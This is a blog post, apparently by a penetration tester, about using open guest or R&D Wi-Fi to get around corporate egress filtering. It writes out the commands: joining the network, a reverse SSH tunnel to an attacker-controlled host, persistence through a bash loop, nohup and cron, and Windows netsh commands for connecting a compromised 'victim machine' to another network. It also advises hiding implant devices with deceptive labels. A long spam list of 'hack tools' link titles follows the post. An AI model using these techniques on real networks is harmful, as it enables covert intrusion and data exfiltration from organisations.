Friday, August 28, 2020

Backchannel Data Exfiltration Via Guest/R&D Wi-Fi


Often times I find unprotected wireless access points with unfettered access to the internet for research or guest access purposes. This is generally through an unauthenticated portal or a direct cable connection. When questioning the business units they explain a low value network, which is simply a internet pass thru separate from the internal network. This sounds reasonable and almost plausible however I usually explain the dangers of having company assets on an unprotected Wi-Fi and the dangers of client side exploits and MITM attacks. But there are a few other plausible scenarios one should be aware of that may scare you a bit more then the former discussion.

What about using OpenWifi as a backchannel data exfiltration medium?

An open Wi-Fi is a perfect data exfiltration medium for attackers to completely bypass egress filtering issues, DLP, proxy filtering issues and a whole bunch of other protection mechanisms in place to keep attackers from sending out shells and moving data between networks. This can easily be accomplished via dual homing your attack host utilizing multiple nic cards which are standard on almost all modern machines. Whether this is from physical access breach or via remote compromise the results can be deadly. Below are a few scenarios, which can lead to undetectable data exfiltration.




Scenario 1: (PwnPlug/Linux host with Wi-Fi adaptor)
The first useful scenario is when a physical perimeter has been breached and a small device from http://pwnieexpress.com/ known as a pwn-plug is installed into the target network or a linux host with a wireless card. I usually install pwn-plug's inside a closet or under a desk somewhere which is not visible and allows a network connection out to an attacker owned host. Typically its a good idea to label the small device as "IT property and Do Not Remove". This will keep a casual user from removing the device. However if there is network egress and proxy filtering present then our network connection may never reach a remote host. At this point your physical breach to gain network access to an impenetrable network perimeter will fail. Unless there happens to be an open cable Wi-Fi connection to an "inconsequential R&D network".

By simply attaching an Alpha card to the pwnplug you can connect to the R&D wireless network. You can then use this network as your outgoing connection and avoid corporate restrictions regarding outbound connections via metasploit or ssh. I have noticed that most clients these days are running heavy egress filtering and packet level protocol detection, which stops outbound connections. Rather then play the obfuscation game i prefer to bypass the restrictions all together using networks which have escaped corporate policy.

You can automate the following via a script if you wardrive the facility prior to entrance and gain insight into the open wireless network, or you can also configure the plug via serial connection on site provided you have time.

Connect to wifi:
ifconfig wlan0 up
iwconfig wlan0 essid [targetNetworkSSID]
dhclient wlan0

Run a reverse SSH tunnel:
ssh -R 3000:127.0.0.1:22 root@remoteHost.com

On the remote host you can retrieve your shell:
ssh -p 3000 User@localhost

Once you have authenticated with the pwnplug via your local host port forward you now have access into the internal network via an encrypted tunnel which will not be detected and fully bypass any corporate security restrictions. You can take this a bit further and setup some persistence in case the shell goes down.. This can be done via bash and nohup if you setup some ssh keys to handle authentication.. One example could be the following script:

Your bash script: 
#---------------------
#!/bin/bash
while true
do
 ssh -R 3000:127.0.0.1:22 root@remoteHost.com
 sleep 10
done
#---------------------

Run this with nohup like this:
nohup ./shell.sh &


Another simple way would be to setup a cron job to run a script with your ssh command on a specified interval for example every 5 minutes like so:

Cron job for every 5 minutes: 
*/5 * * * * /shell.sh



Scenario 2: (Remote Windows Compromise)
The second scenario is that of a compromised modern windows machine with a wireless card, this can be used to make a wireless connection outbound similar to the first scenario which will bypass restrictions by accessing an unrestricted network. As shown in "Vista Power Tools" paper written by Josh Wright you can use modern windows machines cards via the command line.
http://www.inguardians.com/pubs/Vista_Wireless_Power_Tools-Wright.pdf

Below are the commands to profile the networks and export a current profile then import a new profile for your target wireless network. Then from there you can connect and use that network to bypass corp restrictions provided that wireless network doesn't have its own restrictions.

Profile Victim machine and extract a wireless profile: 
netsh wlan show interfaces
netsh wlan show networks mode=bssid
netsh wlan show profiles
netsh wlan export profile name="CorpNetwork"

Then modify that profile to meet the requirements needed for the R&D network and import it into the victim machine.

Upload a new profile and connect to the network: 
netsh wlan add profile filename="R&D.xml"
netsh wlan show profiles
netsh wlan connect name="R&D"

If you check out Josh's excellent paper linked above you will also find ways of bridging between ethernet and wireless adaptors along with lots of other ideas and useful information.

I just got thinking the other day of ways to abuse so called guest or R&D networks and started writing down a few ideas based on scenarios which play out time and time again while penetration testing networks and running physical breach attacks. I hear all to often that a cable connection not linked to the corporate network is totally safe and I call bullshit on that.

More articles

  1. Pentest Tools Port Scanner
  2. Hacking Tools For Windows
  3. Pentest Tools Url Fuzzer
  4. Hacker Tools 2020
  5. Tools Used For Hacking
  6. Wifi Hacker Tools For Windows
  7. Pentest Tools Windows
  8. Hack Tools Mac
  9. Hacker Tools For Windows
  10. Pentest Tools Port Scanner
  11. Hacking Tools Free Download
  12. Hacker Tools Mac
  13. Hacker Tools Software
  14. Pentest Tools List
  15. Best Pentesting Tools 2018
  16. Nsa Hack Tools Download
  17. Hacker Tool Kit
  18. Nsa Hack Tools
  19. Hacker Tools For Windows
  20. Bluetooth Hacking Tools Kali
  21. Bluetooth Hacking Tools Kali
  22. Hacker Tools Github
  23. Physical Pentest Tools
  24. Hacking Tools 2019
  25. Computer Hacker
  26. Hack Tool Apk No Root
  27. Hacker Tools Github
  28. Pentest Tools Port Scanner
  29. Pentest Tools Android
  30. Hacker Tools Online
  31. Free Pentest Tools For Windows
  32. Pentest Tools Port Scanner
  33. Hacker Tools
  34. Hack Tools Github
  35. Nsa Hack Tools
  36. Pentest Tools For Mac
  37. Hack Tools Github
  38. Hacker Tools For Pc
  39. Hacker Tools 2020
  40. Pentest Tools Port Scanner
  41. Computer Hacker
  42. Pentest Tools Website
  43. How To Install Pentest Tools In Ubuntu
  44. Hacker Tools Hardware
  45. Ethical Hacker Tools
  46. Termux Hacking Tools 2019
  47. Hacking Tools Download
  48. Hacker Tools Hardware
  49. Pentest Tools Online
  50. Pentest Tools Port Scanner
  51. Hacking Tools Mac
  52. Termux Hacking Tools 2019
  53. Hacker Tools Hardware
  54. Hacking Tools And Software
  55. Nsa Hack Tools Download
  56. Hacking Tools For Windows Free Download
  57. Hacker Security Tools
  58. Hacking Tools Mac
  59. Easy Hack Tools
  60. Pentest Tools Apk
  61. Hack Apps
  62. Hack Tools Download
  63. Hacking Tools For Games
  64. Hacker Tools Apk
  65. Pentest Tools Nmap
  66. Hacker Tools Apk
  67. Hack Tools Mac
  68. Hacker Security Tools
  69. Hack Website Online Tool
  70. Top Pentest Tools
  71. Hacking Tools Pc
  72. Hacking Tools For Games
  73. Hacker Search Tools
  74. Pentest Tools Website
  75. Pentest Tools Website
  76. Hacking Tools Windows
  77. Hacker Tools For Ios
  78. Game Hacking
  79. Install Pentest Tools Ubuntu
  80. New Hack Tools
  81. Kik Hack Tools
  82. Pentest Tools Bluekeep
  83. Hacker Tools For Windows
  84. Hacking Tools Usb
  85. Pentest Reporting Tools
  86. Hack Tools Pc
  87. Hacker
  88. Best Hacking Tools 2020
  89. Pentest Box Tools Download
  90. Best Pentesting Tools 2018
  91. Hacker Tools 2020
  92. Ethical Hacker Tools
  93. Hacking Tools For Mac
  94. Hacker Tools Linux
  95. Top Pentest Tools
  96. Pentest Tools Find Subdomains
  97. Hacking Tools Name
  98. Hack Rom Tools
  99. Pentest Tools Apk
  100. Hacking Tools For Windows 7
  101. Usb Pentest Tools
  102. Install Pentest Tools Ubuntu
  103. Wifi Hacker Tools For Windows
  104. Hacking Tools 2020
  105. Pentest Tools Online
  106. Free Pentest Tools For Windows
  107. Free Pentest Tools For Windows
  108. What Is Hacking Tools
  109. Hack Tools 2019
  110. Hacker Hardware Tools
  111. Github Hacking Tools
  112. Pentest Tools Apk
  113. Hacks And Tools
  114. Hacking Tools Windows
  115. Hack Tools For Games
  116. Nsa Hacker Tools
  117. How To Hack
  118. Pentest Tools Linux
  119. Hacking Tools For Beginners
  120. Hacker Tools Windows
  121. Growth Hacker Tools
  122. Pentest Tools Review
  123. Hack Tool Apk
  124. Pentest Tools Apk
  125. Hack App
  126. Install Pentest Tools Ubuntu
  127. Hacker Tools 2020
  128. Top Pentest Tools
  129. Pentest Tools For Mac
  130. Physical Pentest Tools
  131. Pentest Tools Port Scanner
  132. Ethical Hacker Tools
  133. Hack Tools Github
  134. Hacker Tools Hardware
  135. Hacker Tools Online
  136. Underground Hacker Sites
  137. Easy Hack Tools
  138. Pentest Tools Website Vulnerability
  139. Hack Tools Download
  140. Nsa Hack Tools
  141. Pentest Tools Find Subdomains
  142. Hacking Tools For Windows Free Download
  143. Hacking Tools Software
  144. Hacker Tools 2020
  145. How To Install Pentest Tools In Ubuntu
  146. Hacker Tools List
  147. Top Pentest Tools
  148. World No 1 Hacker Software
  149. Hack Tools Github
  150. New Hack Tools
  151. Pentest Tools Bluekeep
  152. Hacking Tools Kit
  153. Pentest Tools Website Vulnerability
  154. Hacking Tools Github
  155. Hack Tools
  156. Pentest Tools Windows
  157. Best Pentesting Tools 2018
  158. Usb Pentest Tools
  159. Hack Tools 2019
  160. Hacker Tools Mac
  161. Pentest Tools For Mac
  162. Hacker Tools Free Download
  163. Hack Tools Mac
  164. Hack Tools For Ubuntu
  165. Hack And Tools

No comments: